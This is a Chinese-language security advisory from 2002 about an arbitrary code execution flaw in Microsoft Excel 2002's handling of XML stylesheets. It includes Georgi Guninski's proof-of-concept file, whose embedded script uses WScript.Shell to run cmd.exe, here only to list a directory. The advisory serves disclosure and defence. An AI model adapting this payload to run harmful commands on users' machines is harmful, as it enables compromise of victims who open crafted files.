Microsoft Excel 2002 XML Stylesheet存在任意代码执行漏洞

发布时间：2002-05-28
更新时间：2002-05-28
严重程度：中
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：客户机模式

BUGTRAQ ID：4821

受影响系统

Microsoft Excel 2002
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 95 SR2
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6a

详细描述
Microsoft Excel 2002可以对包含XML stylesheet的XML文档进行操作，当此类文档装载时，会提示用户是否装载相应stylesheet，如果XML stylesheet包含脚本，并用户查看.xls时采用stylesheet，这样夹带的脚本代码就会执行，而且没有对用户进行任何提示。默认情况是不装载XML stylesheet.

测试代码
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

解决方案
尚无

相关信息
Georgi Guninski <guninski@guninski.com>.

最近严重漏洞

Microsoft Excel 2002 XML Stylesheet存在任意代码执行漏洞